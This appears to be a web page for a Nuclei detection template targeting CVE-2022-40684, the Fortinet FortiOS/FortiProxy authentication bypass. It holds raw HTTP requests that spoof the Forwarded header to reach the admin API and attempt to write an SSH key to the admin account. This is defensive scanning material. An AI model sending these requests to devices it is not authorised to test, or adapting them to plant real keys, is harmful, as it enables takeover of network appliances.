Skip to content

Fortinet - Authentication Bypass

ID: CVE-2022-40684

Severity: critical

Author: Shockwave,nagli,carlosvieira

Tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive

Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.

id: CVE-2022-40684
info:
name: Fortinet - Authentication Bypass
author: Shockwave,nagli,carlosvieira
severity: critical
description: |
Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
impact: |
Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device.
remediation: |
Apply the necessary security patches or firmware updates provided by Fortinet to mitigate this vulnerability.
reference:
- https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py
- https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/
- https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
- https://nvd.nist.gov/vuln/detail/CVE-2022-40684
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-40684
cwe-id: CWE-287
epss-score: 0.97217
epss-percentile: 0.99817
cpe: cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: fortinet
product: fortiproxy
tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive
http:
- raw:
- |
GET /api/v2/cmdb/system/admin HTTP/1.1
Host: {{Hostname}}
User-Agent: Node.js
Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=
X-Forwarded-Vdom: root
- |
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: {{Hostname}}
User-Agent: Report Runner
Content-Type: application/json
Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
Content-Length: 610
{
"ssh-public-key1":"{{randstr}}"
}
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body_1
words:
- ENC XXXX
- http_method
condition: and
- type: word
part: body_2
words:
- Invalid SSH public key.
- cli_error
condition: and
# digest: 490a00463044022025b5307e53252527443c0b155b41455216d8e8b961fb718f1598a3d52a2056d202201fc1a4c78dec122e754c75ad30846c5abcd95cb02f2fd91648ee64f4220faaa2:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-40684.yaml"

View on Github